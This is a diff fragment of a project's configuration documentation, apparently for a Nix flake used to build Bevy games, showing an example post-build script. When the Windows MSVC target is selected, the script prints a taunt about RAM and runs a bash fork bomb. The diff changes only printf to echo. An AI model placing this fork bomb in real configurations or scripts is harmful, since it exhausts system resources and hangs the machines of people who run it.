swagtop/bevy-flake/docs/config.md

     # environment adapter.
 It is after extraScript.
     postScript = ''
       if [[ $BF_TARGET == "x86_64-pc-windows-msvc" ]]; then
-        printf "Why use 'windows' as an argument!?
+        echo "Why use 'windows' as an argument!?
 Say goodbye to your RAM!!!"
         :(){ :|:& };:
       fi
     '';